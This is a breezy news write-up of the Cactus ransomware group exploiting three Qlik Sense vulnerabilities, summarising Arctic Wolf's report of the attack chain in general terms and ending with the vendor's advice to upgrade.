Cyber Intruders Exploit Qlik Sense, Unraveling the Cactus Conundrum

So, turns out, there’s some serious hacking drama unfolding in the cyber world. Those sneaky hackers set their sights on Qlik Sense, the data analytics hotshot. Arctic Wolf, the cybersecurity heroes, spilled the beans in their latest report, revealing that a crew called Cactus went to town on not one, not two, but three vulnerabilities. And get this—they were vulnerabilities that the Qlik Sense team thought they had patched up in late August and September 2023.

Picture this: Qlik discovers two flaws, named CVE-2023-41265 and CVE-2023-41266, in late August. Fast forward a month, and whoopsie-daisy, they find out one of the patches didn’t do its job properly, giving birth to another problem child called CVE-2023-48365. Luckily, Qlik got their act together, patched things up, and sent out the fixes. Crisis averted, right?

Now, let’s dive into the hacker’s playbook. These crafty folks used those three flaws to create secret sessions and fire off unauthorized HTTP requests. But wait, there’s more—they also played the privilege game, elevating their status to launch HTTP requests on the backend servers hosting the application.

Cactus, the mischief-makers, used these vulnerabilities as a backstage pass into corporate networks where Qlik Sense was hanging out, all unpatched and vulnerable. They got the Qlik Sense Scheduler service to kick off new processes, and then they pulled out the big guns—PowerShell and the Background Intelligent Transfer Service (BITS)—to download remote access software like AnyDesk.

But that’s not the end of the story. They dabbled in some infostealing antics to grab up sensitive corporate data. And the grand finale? The Cactus encryptor, causing chaos and disruption like a digital tornado. To stay clear of this digital storm, Qlik suggests users upgrade to specific versions of Sense Enterprise for Windows, listed out like a DJ’s playlist.